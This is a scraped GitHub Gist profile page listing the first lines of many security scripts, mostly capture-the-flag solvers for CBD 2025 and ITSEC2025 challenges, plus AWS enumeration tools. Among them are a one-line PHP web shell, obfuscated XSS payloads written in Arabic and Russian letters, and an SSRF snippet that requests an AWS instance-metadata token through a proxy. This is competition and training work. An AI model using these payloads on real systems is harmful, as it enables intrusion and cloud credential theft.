Azka A Maarij lawbyte

🏠

Working from home

lawbyte / aws_region_enumeration.py

Created September 7, 2025 20:50

	#!/usr/bin/env python3
	"""
	Region Enumeration Script
	Try to find the EC2 instance in different AWS regions
	"""

	import boto3
	import json
	import sys
	from botocore.exceptions import ClientError, NoCredentialsError, EndpointConnectionError

lawbyte / targeted_aws_enumeration.py

Created September 7, 2025 20:24

	#!/usr/bin/env python3
	"""
	Targeted AWS Enumeration Script
	Focus on services that were accessible in the original enumeration
	"""

	import boto3
	import json
	import sys
	import time

lawbyte / CBD_Foren_StolenData-Solver.py

Created August 17, 2025 18:50

	#!/usr/bin/env python3
	"""
	pcap_flag_solver.py
	-------------------
	Extracts and decrypts AES/HMAC-protected C2 messages from a PCAP/PCAPNG and prints any CTF-like flags found.

	Assumptions (derived from embedded PowerShell in the PCAP):
	- $sharedHex is present in the capture and provides key material (32 bytes as hex).
	- AES-128-CBC for confidentiality.
	- HMAC-SHA256 over (IV \|\| CT) for integrity.

lawbyte / CBD_PWN_Teletype-Solver.py

Created August 17, 2025 18:36

	#!/usr/bin/env python3
	from pwn import *
	import sys

	context.arch = "amd64"
	context.log_level = "info"

	HOST = args.HOST or "teletype.serv1.cbd2025.cloud"
	PORT = int(args.PORT or 443)

lawbyte / CBD_PWN_StartingPoint-Solver.py

Created August 17, 2025 18:35

	#!/usr/bin/env python3
	from pwn import *

	context.arch = "amd64"
	context.log_level = "INFO"

	HOST = "starting-point.serv1.cbd2025.cloud"
	PORT = 443
	BIN = "./starting-point"

lawbyte / CBD_Web_Racing-solver.py

Created August 17, 2025 18:23

	#!/usr/bin/env python3
	# ultra-min: hardcoded target, only --cmd, 1 poller thread
	import argparse, io, time, threading, random, string
	import requests
	from urllib.parse import quote

	BASE = "https://racing.serv2.cbd2025.cloud" # hardcoded
	PHP_SHELL = b"<?php if(isset($_GET['x'])){system($_GET['x']);} ?>"

	def rand_name():

lawbyte / XSS-Written-In-X.md

Created August 7, 2025 11:55

XSS Payload Written In Arabic

ا='',ب=!ا+ا,ت=!ب+ا,ث=ا+{},ج=ب[ا++],ح=ب[خ=ا],
د=++خ+ا,ذ=ث[خ+د],ب[ذ+=ث[ا]+(ب.ت+ث)[ا]+ت[د]+ج+ح+ب[خ]+ذ+ج+ث[ا]+ح][ذ](ت[ا]+ت[خ]+ب[د]+ح+ج+"(1)")()

XSS Payload Written in Russian 🇷🇺

а='',б=!а+а,в=!б+а,г=а+{},д=б[а++],е=б[ж=а],
з=++ж+а,и=г[ж+з],б[и+=г[а]+(б.в+г)[а]+в[з]+д+е+б[ж]+и+д+г[а]+е][и](в[а]+в[ж]+б[з]+е+д+"('взломано')")()

lawbyte / ITSEC2025_WEB_ImageVault_Solver.py

Created August 5, 2025 11:40

	from pyngrok import ngrok
	from flask import Flask, request
	from urllib.parse import urljoin
	from PIL import Image, PngImagePlugin
	from bs4 import BeautifulSoup
	import threading
	import requests
	import urllib3
	import io
	import time

lawbyte / ITSEC2025_CLOUD_MonkeyProx_task_explorer.py

Created August 5, 2025 09:37

	#!/usr/bin/env python3
	"""
	Task Explorer
	Focuses on exploring the specific running task we discovered
	"""

	import boto3
	import json
	import requests
	from botocore.exceptions import ClientError

lawbyte / ITSEC2025_CLOUD_MonkeyProx_getToken.py

Created August 5, 2025 09:35

get aws metadata token

	import httpx
	import json
	from datetime import datetime

	client = httpx.Client()
	base_url = "http://54.251.250.184:5000/proxy"
	metadata_url = "http://169.254.169.254"

	# Get metadata token
	token_url = f"{base_url}?url={metadata_url}/latest/api/token&method=PUT"